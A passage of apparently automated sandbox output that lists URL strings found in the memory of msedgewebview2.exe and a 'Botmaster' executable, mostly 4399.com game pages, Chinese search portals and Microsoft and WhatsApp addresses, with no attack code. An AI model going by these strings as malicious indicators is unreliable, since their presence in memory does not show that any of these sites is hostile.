                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/208107_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/209567_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/210650_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/212767_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/21552_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/216417_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/21674_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217370_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217603_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217622_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217629_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217706_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217815_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217844_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217855_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/217926_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/218066_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/218162_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/218717_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/218860_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/218939_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/220266_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/221162_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/221700_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/221839_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/222061_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/222151_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/222442_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/22287_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/223745.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/223745_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/225193_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/227465_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/230446_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/231814_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/27924.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/27924_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/32979_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/35538.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/35538_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/3881_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/3883_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/39379_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/40779_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/41193_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/42760_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/43689_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/43841_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/47931_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/47931_1.htmhttps://www.4399.com/flash/43841_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/48272_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/48504.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/48504_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/55146_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/59227_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/60369_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/6232_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/63805_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/65731_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/69112_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/69156_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/70215_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/72526_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/73386.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/776_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/79452_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/81895_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/83345_4.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/85646_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/87425_2.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/88902_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/90302_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/93015_1.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/93398_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/93551_3.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/yzzrhj.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/zmhj.htm
                  Source: msedgewebview2.exe, 0000001D.00000002.3695585487.00002DDC0055C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.4399.com/flash/zmhj.htm#search3-6407
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.91duba.com/?
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.91duba.com/?f=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/?tn=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?tn=15007414_9_dg&wd=
                  Source: msedgewebview2.exe, 0000001D.00000002.3691208452.00002DDC000F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                  Source: msedgewebview2.exe, 00000020.00000002.3641355482.00001B4400024000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564433283.00002DDC01128000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564262880.00002DDC00C70000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566414130.00002DDC011D8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2569444937.00002DDC00DD0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2567021699.00002DDC0150C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564378630.00002DDC005E8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2566304427.00002DDC01548000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2570283052.00002DDC01234000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2564490059.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3651704953.00001B4400211000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570018424.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570916979.00001B4400508000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2567101578.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2444055118.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2477239359.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2394075869.00001B4400448000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2464321631.00001B4400AD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395003417.00001B4400434000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3657418818.00001B44002A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2621450426.00001B440044D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.douyin.com/?ug_source=
                  Source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000DA2000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.emojicopy.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.flash.cn/success
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hao123.com/?tn=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.huobi.com/?utm_source=UT&utm_medium=prodnews&inviter_id=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iduba.com/sv.html?f=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jiegeng.com
                  Source: msedgewebview2.exe, 00000026.00000003.2529580323.00004B180119C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jio.com/.
                  Source: msedgewebview2.exe, 0000001D.00000002.3695585487.00002DDC0055C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ludashi.com/cms/server/monitor.php?id=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2334721555.000024540089C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2429036422.000024540089C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2465710972.00004B1800894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.microsoftnews.cn/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000003.2334721555.000024540089C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2429036422.000024540089C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000026.00000003.2465710972.00004B1800894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.microsoftnews.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.cn/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000024.00000002.2417511260.0000245400298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nate.com/?f=nateontb
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newduba.cn/?
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newduba.cn/?f=
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/
                  Source: msedgewebview2.exe, 00000020.00000002.3641112283.00001B440000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/har
                  Source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: msedgewebview2.exe, 0000001D.00000002.3712866193.00002DDC01578000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3714507901.00002DDC0172C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3713947284.00002DDC016B2000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3713947284.00002DDC016B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/$k
                  Source: msedgewebview2.exe, 0000001D.00000002.3713947284.00002DDC016B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/OfficeeEATE
                  Source: msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/w
                  Source: msedgewebview2.exe, 00000020.00000003.2551397552.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3242051549.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2417345597.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000002.3646953393.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2389149841.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2393797833.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2570742173.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2572592263.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2549778911.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2380315982.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2395379840.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.3402831613.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622076580.00001B4400118000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2324739957.00001B440011C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2565835791.00001B4400118000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.so.com/?src=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695585487.00002DDC0055C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.so.com/s?ie=
                  Source: msedgewebview2.exe, 0000001D.00000002.3695321952.00002DDC004B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sogou.com/web?ie=
                  Source: msedgewebview2.exe, 00000024.00000002.2422477300.0000245400378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.staging-bing-int.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.startfenster.de
                  Source: msedgewebview2.exe, 0000001D.00000002.3695947541.00002DDC005B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.startseite24.net
                  Source: msedgewebview2.exe, 00000023.00000002.3657476152.00007AAC000C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com
                  Source: msedgewebview2.exe, 0000001D.00000002.3653662940.0000021F2D6AF000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3691899074.00002DDC0012C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2434494801.00002DDC00ED0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2379485108.00002DDC011B0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2581175981.00002DDC014F0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3711088881.00002DDC01124000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3697383349.00002DDC006EC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3698891463.00002DDC007B4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3703332569.00002DDC00A88000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3696502178.00002DDC0063C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3709467420.00002DDC00FD4000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3713312387.00002DDC01618000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3705679870.00002DDC00CEC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2367024620.00002DDC01138000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702150914.00002DDC0096C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3702232003.00002DDC0098C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3683468474.0000021F34D30000.00000002.00000001.00040000.0000004E.sdmp, msedgewebview2.exe, 0000001D.00000002.3696975013.00002DDC006D1000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2436721589.0000021F32A5E000.00000004.00000020.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3700547825.00002DDC0088C000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/
                  Source: msedgewebview2.exe, 0000001D.00000002.3697383349.00002DDC006EC000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3709467420.00002DDC00FD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/-
                  Source: msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/.net
                  Source: msedgewebview2.exe, 00000020.00000003.2623847305.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2581864583.00001B4400444000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 00000020.00000003.2622209243.00001B4400444000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/0
                  Source: msedgewebview2.exe, 0000001D.00000002.3710696575.00002DDC010C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/2
                  Source: msedgewebview2.exe, 0000001D.00000002.3704676650.00002DDC00BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/6d64fd2db8-
                  Source: msedgewebview2.exe, 0000001D.00000003.2581028359.00002DDC005A8000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000002.3712540998.00002DDC01500000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015A0000.00000004.00000800.00020000.00000000.sdmp, msedgewebview2.exe, 0000001D.00000003.2579764975.00002DDC015AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.whatsapp.com/?lang=af
